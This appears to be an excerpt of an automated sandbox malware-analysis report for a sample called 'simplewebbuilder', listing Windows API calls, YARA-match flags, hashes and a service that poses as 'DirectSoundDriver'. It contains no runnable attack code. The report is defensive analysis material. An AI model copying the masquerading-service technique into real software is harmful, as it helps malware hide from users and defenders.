                                                                                                                            • Snapshot File: hcaresult_17_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2422867632-0
                                                                                                                            • Opcode ID: 0c7ee1cc73cfdaeef6b567d635646d1599ea5fe8a9a2914a0dbf5fe02a1caa74
                                                                                                                            • Instruction ID: b8bf24d317afa3ceebc9473ffeb10f3211ca65595062ed6c02d19fe1b4d66eae
                                                                                                                            • Opcode Fuzzy Hash: 0c7ee1cc73cfdaeef6b567d635646d1599ea5fe8a9a2914a0dbf5fe02a1caa74
                                                                                                                            • Instruction Fuzzy Hash: 44A00171819411AAC6245A945E48925252871193B53350B7AA173B50E08A38400A662A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 009C1C10: OpenEventA.KERNEL32(00100002,00000000,00000000,C05FB8F7), ref: 009C1CB0
                                                                                                                              • Part of subcall function 009C1C10: CloseHandle.KERNEL32(00000000), ref: 009C1CC5
                                                                                                                              • Part of subcall function 009C1C10: ResetEvent.KERNEL32(00000000,C05FB8F7), ref: 009C1CCF
                                                                                                                              • Part of subcall function 009C1C10: CloseHandle.KERNEL32(00000000,C05FB8F7), ref: 009C1D04
                                                                                                                            • TlsSetValue.KERNEL32(00000026,?), ref: 009C27AA
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseEventHandle$OpenResetValue
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1556185888-0
                                                                                                                            • Opcode ID: fdc3fb34052b9f95ab4003739b66ed4d7d87698180de469d7e6b2ec95c208176
                                                                                                                            • Instruction ID: d3890c4a925ab2e9a524bbddd9d74bcb15111cb689a53b50e11117a02b7621f2
                                                                                                                            • Opcode Fuzzy Hash: fdc3fb34052b9f95ab4003739b66ed4d7d87698180de469d7e6b2ec95c208176
                                                                                                                            • Instruction Fuzzy Hash: 36018F71A44244ABC700CF99DC45F5ABBA8EB49761F10462AF824D33C1D731A90086A5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009EB000.00000040.00001000.00020000.00000000.sdmp, Offset: 009EB000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9eb000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Sleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3472027048-0
                                                                                                                            • Opcode ID: 91b30dd963cefe388162bafb3b12ddf6161199e373035897bd49151b6d8bd542
                                                                                                                            • Instruction ID: 08cde1a41c6ef7632196307b1d2239d9bb9ff5edf865f0f0f8b948e97b87b7e3
                                                                                                                            • Opcode Fuzzy Hash: 91b30dd963cefe388162bafb3b12ddf6161199e373035897bd49151b6d8bd542
                                                                                                                            • Instruction Fuzzy Hash: 97D0A772C7D234D7CA403A9C7C0446773AC9A15610F090035CC4153700F952A91042D3
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(000003E8), ref: 004025D7
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3332985584.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000011.00000002.3332985584.000000000040B000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Sleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3472027048-0
                                                                                                                            • Opcode ID: ae7afe965ff9a3ecbc8486dd1b4689d18e3202cc6d0a72081f8daf504a349405
                                                                                                                            • Instruction ID: 99bdeb66c25d7882e47129af594b0bc7f949bf8350cb5c478b60691a8db92f05
                                                                                                                            • Opcode Fuzzy Hash: ae7afe965ff9a3ecbc8486dd1b4689d18e3202cc6d0a72081f8daf504a349405
                                                                                                                            • Instruction Fuzzy Hash: 05C04C30648A00FBD15217905F1DF78B624AB48704F2105336202744D04EFD655A6A5F
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(000007D0), ref: 0040D2DD
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3332985584.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000011.00000002.3332985584.000000000040B000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Sleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3472027048-0
                                                                                                                            • Opcode ID: 4b54607c53e5afc8bcad59e31fb2df2bd3f5564124c78793773209d2963770df
                                                                                                                            • Instruction ID: d4b1b726c4b427a33dedd67dcd64e749c90eb7d8801a8fafa5166cc988795ddd
                                                                                                                            • Opcode Fuzzy Hash: 4b54607c53e5afc8bcad59e31fb2df2bd3f5564124c78793773209d2963770df
                                                                                                                            • Instruction Fuzzy Hash: 96B09221948A00D6E20407E06F09F2035207701700F20027BA30B344E18ABD045ABA0F
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3332985584.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000011.00000002.3332985584.000000000040B000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4275171209-0
                                                                                                                            • Opcode ID: dd2500420811c0cf5d79b7dbb7b62d26b288871a1f23200e63fe0e4b8f5fc987
                                                                                                                            • Instruction ID: 09a3a55a0c1ccc5a13469ec0f5d8f443f01b90285bca804ea3e96fc62782eb60
                                                                                                                            • Opcode Fuzzy Hash: dd2500420811c0cf5d79b7dbb7b62d26b288871a1f23200e63fe0e4b8f5fc987
                                                                                                                            • Instruction Fuzzy Hash: C2B0927AC04112EFDB111BA08A04468BA60AB08340725407AE54272250C638442DABDD
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3332985584.000000000040B000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000011.00000002.3332985584.0000000000400000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcmpi
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1586166983-0
                                                                                                                            • Opcode ID: 1133d926d828d468f2c0823ec2603520c2d080e7cd513d012715edb874195993
                                                                                                                            • Instruction ID: 1999ed2a319cb111f58d93e36599d65504c6bfb494e199db35daf75dc5fcdc4b
                                                                                                                            • Opcode Fuzzy Hash: 1133d926d828d468f2c0823ec2603520c2d080e7cd513d012715edb874195993
                                                                                                                            • Instruction Fuzzy Hash: 1F900260304201EFE2000B325F0C31525A46704641712443D5447E0194DA7C8005956A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 009BA0CF: __EH_prolog.LIBCMT ref: 009BA0D4
                                                                                                                              • Part of subcall function 009BA0CF: _Allocate.LIBCPMT ref: 009BA12B
                                                                                                                              • Part of subcall function 009BA0CF: _memmove.LIBCMT ref: 009BA182
                                                                                                                            • _memset.LIBCMT ref: 009C0F39
                                                                                                                            • FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,00000010,00000000), ref: 009C0FA2
                                                                                                                            • GetLastError.KERNEL32(?,00000400,?,00000010,00000000), ref: 009C0FAA
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateErrorFormatH_prologLastMessage_memmove_memset
                                                                                                                            • String ID: Unknown error$invalid string position
                                                                                                                            • API String ID: 1854462395-1837348584
                                                                                                                            • Opcode ID: 629ac290146b9226b5def0cc62c36f6d3185d6c31b25377b262d7cf6123a4098
                                                                                                                            • Instruction ID: 8c7213f5d48853a3f56a92fdbeb434c553c719bfc58e50bbbde8bf86a539fcf8
                                                                                                                            • Opcode Fuzzy Hash: 629ac290146b9226b5def0cc62c36f6d3185d6c31b25377b262d7cf6123a4098
                                                                                                                            • Instruction Fuzzy Hash: 0F51BA70A08381CFE714DF24C890F6FBBE8AB99744F50092DF48197292D771E6888B97
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,009C5496,?,?,?,00000001), ref: 009C9B2D
                                                                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 009C9B36
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
Yara matches
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
• Opcode ID: a5ea72b52a73c2f147323ec3cadc2760bfed1d41004b65b41d910856afaf8d34
• Instruction ID: 5e829e3ba779c0d89b833031aec784dba6e256d3ce89609d688c5986b8e86579
• Opcode Fuzzy Hash: a5ea72b52a73c2f147323ec3cadc2760bfed1d41004b65b41d910856afaf8d34
• Instruction Fuzzy Hash: DCB092310A9208FBCB002B91EC09B8A3F28EB05662F008012F60D840A28F625494AAA1
Uniqueness
Uniqueness Score: -1.00%
APIs
Memory Dump Source
• Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
Yara matches
Similarity
• API ID: _memset
• String ID:
• API String ID: 2102423945-0
• Opcode ID: 50ed358c2bc5baa28b61a63f85c8bcfb39f11c9cdbb9bf2bbec23c38127e8fb6
• Instruction ID: 2a3e1000ac3e512c6e4f1714b9d91ef26b176fdcc43107252e5dd061cef89c92
• Opcode Fuzzy Hash: 50ed358c2bc5baa28b61a63f85c8bcfb39f11c9cdbb9bf2bbec23c38127e8fb6
• Instruction Fuzzy Hash: 39F082B190430DABD700DF95DA42B9DFBB8FB84310F208179E50CA7341E6707A118B91
Uniqueness
Uniqueness Score: -1.00%
APIs
• __EH_prolog.LIBCMT ref: 009B24E6
• InterlockedCompareExchange.KERNEL32(?,00000000,00000001), ref: 009B24FC
• RtlEnterCriticalSection.NTDLL(?), ref: 009B250E
• RtlLeaveCriticalSection.NTDLL(?), ref: 009B256D
• SetLastError.KERNEL32(00000000,?,7591DFB0), ref: 009B257F
• GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?,7591DFB0), ref: 009B2599
• GetLastError.KERNEL32(?,7591DFB0), ref: 009B25A2
• InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 009B25F0
• InterlockedDecrement.KERNEL32(00000002), ref: 009B262F
• InterlockedExchange.KERNEL32(00000000,00000000), ref: 009B268E
• InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 009B2699
• InterlockedExchange.KERNEL32(00000000,00000001), ref: 009B26AD
• PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,7591DFB0), ref: 009B26BD
• GetLastError.KERNEL32(?,7591DFB0), ref: 009B26C7
Memory Dump Source
• Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
Yara matches
Similarity
• API ID: Interlocked$Exchange$ErrorLast$CompareCompletionCriticalQueuedSectionStatus$DecrementEnterH_prologLeavePost
• String ID:
• API String ID: 1213838671-0
• Opcode ID: 9bb1a5d6ef148c9cd366463ff1bbf864dc17b056d20d9b693403c6fe061824f3
• Instruction ID: 80add12356d52c56145ee1d1d8b117e3c15d76b75059c2b9a39196276da54f7c
• Opcode Fuzzy Hash: 9bb1a5d6ef148c9cd366463ff1bbf864dc17b056d20d9b693403c6fe061824f3
• Instruction Fuzzy Hash: B3616E71915209EFCB10DFA4C989AEEBBF9FF48320F14492EE516E3251DB34A944DB60
Uniqueness
Uniqueness Score: -1.00%
APIs
• __EH_prolog.LIBCMT ref: 009B471C
  • Part of subcall function 009C414C: _malloc.LIBCMT ref: 009C4164
• htons.WS2_32(?), ref: 009B477D
• htonl.WS2_32(?), ref: 009B47A0
• htonl.WS2_32(00000000), ref: 009B47A7
• htons.WS2_32(00000000), ref: 009B485B
• _sprintf.LIBCMT ref: 009B4871
  • Part of subcall function 009B8F82: _memmove.LIBCMT ref: 009B8FA2
• htons.WS2_32(?), ref: 009B47C4
  • Part of subcall function 009B9D2D: __EH_prolog.LIBCMT ref: 009B9D32
  • Part of subcall function 009B9D2D: RtlEnterCriticalSection.NTDLL(00000020), ref: 009B9DAD
  • Part of subcall function 009B9D2D: RtlLeaveCriticalSection.NTDLL(00000020), ref: 009B9DCB
  • Part of subcall function 009B1BA7: __EH_prolog.LIBCMT ref: 009B1BAC
  • Part of subcall function 009B1BA7: RtlEnterCriticalSection.NTDLL ref: 009B1BBC
  • Part of subcall function 009B1BA7: RtlLeaveCriticalSection.NTDLL ref: 009B1BEA
  • Part of subcall function 009B1BA7: RtlEnterCriticalSection.NTDLL ref: 009B1C13
  • Part of subcall function 009B1BA7: RtlLeaveCriticalSection.NTDLL ref: 009B1C56
  • Part of subcall function 009BE4E9: __EH_prolog.LIBCMT ref: 009BE4EE
• htonl.WS2_32(?), ref: 009B4A90
• htonl.WS2_32(00000000), ref: 009B4A97
• htonl.WS2_32(00000000), ref: 009B4ADC
• htonl.WS2_32(00000000), ref: 009B4AE3
• htons.WS2_32(?), ref: 009B4B03
• htons.WS2_32(?), ref: 009B4B0D
Memory Dump Source
• Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
Yara matches
Similarity
• API ID: CriticalSectionhtonl$htons$H_prolog$EnterLeave$_malloc_memmove_sprintf
• String ID:
• API String ID: 1645262487-0
• Opcode ID: c884afd309f5e18bf6d66aea0acefebaff0710685e5937bc90925e755cab8a30
• Instruction ID: 813c604cf18c134de072b8d7ce451c8b907fd6df0d938fb9ea071628c0707ccb
• Opcode Fuzzy Hash: c884afd309f5e18bf6d66aea0acefebaff0710685e5937bc90925e755cab8a30
• Instruction Fuzzy Hash: F9029A71C0121DEFDF15DBE4C945BEEBBB8AF48324F10405AE505B7292DB705A88DBA2
Uniqueness
Uniqueness Score: -1.00%
APIs
• RegisterServiceCtrlHandlerA.ADVAPI32(DirectSoundDriver 2.36.198.67,0040235E), ref: 004023C1
• SetServiceStatus.ADVAPI32(0040C418), ref: 00402420
• GetLastError.KERNEL32 ref: 00402422
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040242F
• GetLastError.KERNEL32 ref: 00402450
• SetServiceStatus.ADVAPI32(0040C418), ref: 00402480
• CreateThread.KERNEL32 ref: 0040248C
• WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00402495
• CloseHandle.KERNEL32 ref: 004024A1
• SetServiceStatus.ADVAPI32(0040C418), ref: 004024CA
Strings
• DirectSoundDriver 2.36.198.67, xrefs: 004023BC
Memory Dump Source
• Source File: 00000011.00000002.3332985584.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.3332985584.000000000040B000.00000040.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_simplewebbuilder.jbxd
Similarity
• API ID: Service$Status$CreateErrorLast$CloseCtrlEventHandleHandlerObjectRegisterSingleThreadWait
• String ID: DirectSoundDriver 2.36.198.67
• API String ID: 3346042915-3753546761
• Opcode ID: 5fcb9a5b87dc8469fff6859aaf6bea1fa8643ec6b521037b188f0322a84c0a7e
• Instruction ID: 1a01264c41601166a4e66a8b54459f3afdfc7a3d4d59415bdd3a2783c39f4923
• Opcode Fuzzy Hash: 5fcb9a5b87dc8469fff6859aaf6bea1fa8643ec6b521037b188f0322a84c0a7e
• Instruction Fuzzy Hash: F821D670401210EBD2105F26EFE996A7EACFBC9754751823EE544B22B1C7B90409DF6C
Uniqueness
Uniqueness Score: -1.00%
APIs
• RtlDecodePointer.NTDLL(?), ref: 009C893A
• _free.LIBCMT ref: 009C8953
  • Part of subcall function 009C3574: HeapFree.KERNEL32(00000000,00000000,?,009C62D2,00000000,00000104,75920A60), ref: 009C3588
  • Part of subcall function 009C3574: GetLastError.KERNEL32(00000000,?,009C62D2,00000000,00000104,75920A60), ref: 009C359A
• _free.LIBCMT ref: 009C8966
• _free.LIBCMT ref: 009C8984
• _free.LIBCMT ref: 009C8996
• _free.LIBCMT ref: 009C89A7
• _free.LIBCMT ref: 009C89B2
• _free.LIBCMT ref: 009C89D6
• RtlEncodePointer.NTDLL(0080A680), ref: 009C89DD
• _free.LIBCMT ref: 009C89F2
• _free.LIBCMT ref: 009C8A08
• _free.LIBCMT ref: 009C8A30
Memory Dump Source
• Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
Yara matches
Similarity
• API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
• String ID:
• API String ID: 3064303923-0
• Opcode ID: b3da8b26474f7922520dda19294a9cafa49feb1389a2878edd8606d740761b94
• Instruction ID: a9316c0fa0a2f06f890dcaf1eb2d3da977df14ef7581073636835f31f7d91933
• Opcode Fuzzy Hash: b3da8b26474f7922520dda19294a9cafa49feb1389a2878edd8606d740761b94
• Instruction Fuzzy Hash: C3217372D2D6918BCB215F94FC80F27BB68A746321319816EF4085B2B1CA345E41EB93
Uniqueness
Uniqueness Score: -1.00%
APIs
• LCMapStringW.KERNEL32(00000000,00000100,00408658,00000001,00000000,00000000,00000103,00000001,00000000,?,00405537,00200020,00000000,?,00000000,00000000), ref: 00406B05
• LCMapStringA.KERNEL32(00000000,00000100,00408654,00000001,00000000,00000000,?,00405537,00200020,00000000,?,00000000,00000000,00000001), ref: 00406B21
• LCMapStringA.KERNEL32(?,?,?,?,7U@ ,?,00000103,00000001,00000000,?,00405537,00200020,00000000,?,00000000,00000000), ref: 00406B6A
• MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,00200020,00000000,00000000,00000103,00000001,00000000,?,00405537,00200020,00000000,?,00000000,00000000), ref: 00406BA2
• MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,00405537,00200020,00000000,?,00000000), ref: 00406BFA
• LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,00405537,00200020,00000000,?,00000000), ref: 00406C10
• LCMapStringW.KERNEL32(?,?,?,00000000,7U@ ,?,?,00405537,00200020,00000000,?,00000000), ref: 00406C43
• LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,00405537,00200020,00000000,?,00000000), ref: 00406CAB
Memory Dump Source
• Source File: 00000011.00000002.3332985584.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.3332985584.000000000040B000.00000040.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_simplewebbuilder.jbxd
Similarity
• API ID: String$ByteCharMultiWide
• String ID: 7U@
• API String ID: 352835431-3990396050
• Opcode ID: 7311542cf2bc8e314ac09162f2172350a795be2e08e0f18793ed5822aaba0d35
• Instruction ID: 02e506ee65740420ae3233abb4e535ac9c0d9cfafd58d7118099ca6790f9c1e8
• Opcode Fuzzy Hash: 7311542cf2bc8e314ac09162f2172350a795be2e08e0f18793ed5822aaba0d35
• Instruction Fuzzy Hash: FE51AE71500209EFDF219F54CE49EAF7FB5FB48750F11412AF952B22A0D73A8861EB68
Uniqueness
Uniqueness Score: -1.00%
                                                                                                                            APIs
                                                                                                                            • __EH_prolog.LIBCMT ref: 009B3428
                                                                                                                            • GetModuleHandleA.KERNEL32(KERNEL32,CancelIoEx), ref: 009B346B
                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 009B3472
                                                                                                                            • GetLastError.KERNEL32 ref: 009B3486
                                                                                                                            • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 009B34D7
                                                                                                                            • RtlEnterCriticalSection.NTDLL(00000018), ref: 009B34ED
                                                                                                                            • RtlLeaveCriticalSection.NTDLL(00000018), ref: 009B3518
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$AddressCompareEnterErrorExchangeH_prologHandleInterlockedLastLeaveModuleProc
                                                                                                                            • String ID: CancelIoEx$KERNEL32
                                                                                                                            • API String ID: 2902213904-434325024
Uniqueness

Uniqueness Score: -1.00%

APIs
• LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,004053C1,?,Microsoft Visual C++ Runtime Library,00012010,?,0040858C,?,004085DC,?,?,?,Runtime Error!Program: ), ref: 00406735
• GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 0040674D
• GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 0040675E
• GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 0040676B
Strings
Memory Dump Source
• Source File: 00000011.00000002.3332985584.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.3332985584.000000000040B000.00000040.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_simplewebbuilder.jbxd
Similarity
• API ID: AddressProc$LibraryLoad
• String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
• API String ID: 2238633743-4044615076
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetStringTypeW.KERNEL32(00000001,00408658,00000001,00000000,00000103,00000001,00000000,00405537,00200020,00000000,?,00000000,00000000,00000001), ref: 004069B9
• GetStringTypeA.KERNEL32(00000000,00000001,00408654,00000001,?,?,00000000,00000000,00000001), ref: 004069D3
• GetStringTypeA.KERNEL32(00000000,00000000,?,00000000,00200020,00000103,00000001,00000000,00405537,00200020,00000000,?,00000000,00000000,00000001), ref: 00406A07
• MultiByteToWideChar.KERNEL32(7U@ ,00000002,?,00000000,00000000,00000000,00000103,00000001,00000000,00405537,00200020,00000000,?,00000000,00000000,00000001), ref: 00406A3F
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000001), ref: 00406A95
• GetStringTypeW.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000001), ref: 00406AA7
Strings
Memory Dump Source
• Source File: 00000011.00000002.3332985584.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.3332985584.000000000040B000.00000040.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_simplewebbuilder.jbxd
Similarity
• API ID: StringType$ByteCharMultiWide
• String ID: 7U@
• API String ID: 3852931651-3990396050
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 0040530A
• GetStdHandle.KERNEL32(000000F4,0040858C,00000000,?,00000000,00000000), ref: 004053E0
• WriteFile.KERNEL32(00000000), ref: 004053E7
Strings
Memory Dump Source
• Source File: 00000011.00000002.3332985584.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.3332985584.000000000040B000.00000040.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_simplewebbuilder.jbxd
Similarity
• API ID: File$HandleModuleNameWrite
• String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
• API String ID: 3784150691-4022980321
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00403196), ref: 00404DCF
• GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00403196), ref: 00404DE3
• GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00403196), ref: 00404E0F
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00403196), ref: 00404E47
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00403196), ref: 00404E69
• FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00403196), ref: 00404E82
• GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00403196), ref: 00404E95
• FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00404ED3
Memory Dump Source
• Source File: 00000011.00000002.3332985584.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.3332985584.000000000040B000.00000040.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_simplewebbuilder.jbxd
Similarity
• API ID: EnvironmentStrings$ByteCharFreeMultiWide
• String ID:
• API String ID: 1823725401-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• OpenEventA.KERNEL32(00100002,00000000,00000000,C05FB8F7), ref: 009C1CB0
• CloseHandle.KERNEL32(00000000), ref: 009C1CC5
• ResetEvent.KERNEL32(00000000,C05FB8F7), ref: 009C1CCF
• CloseHandle.KERNEL32(00000000,C05FB8F7), ref: 009C1D04
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,C05FB8F7), ref: 009C1D7A
• CloseHandle.KERNEL32(00000000), ref: 009C1D8F
Memory Dump Source
• Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
Yara matches
Similarity
• API ID: CloseEventHandle$CreateOpenReset
• String ID:
• API String ID: 1285874450-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• InterlockedExchange.KERNEL32(?,00000001), ref: 009B20AC
• SetWaitableTimer.KERNEL32(00000000,?,00000001,00000000,00000000,00000000), ref: 009B20CD
• InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 009B20D8
• InterlockedDecrement.KERNEL32(?), ref: 009B213E
• GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?), ref: 009B217A
• InterlockedDecrement.KERNEL32(?), ref: 009B2187
• InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 009B21A6
Memory Dump Source
• Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
Yara matches
Similarity
• API ID: Interlocked$Exchange$Decrement$CompletionQueuedStatusTimerWaitable
• String ID:
• API String ID: 1171374749-0
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 009C24D0: OpenEventA.KERNEL32(00100002,00000000,?,?,?,009C1D2E,?,?), ref: 009C24FF
  • Part of subcall function 009C24D0: CloseHandle.KERNEL32(00000000,?,?,009C1D2E,?,?), ref: 009C2514
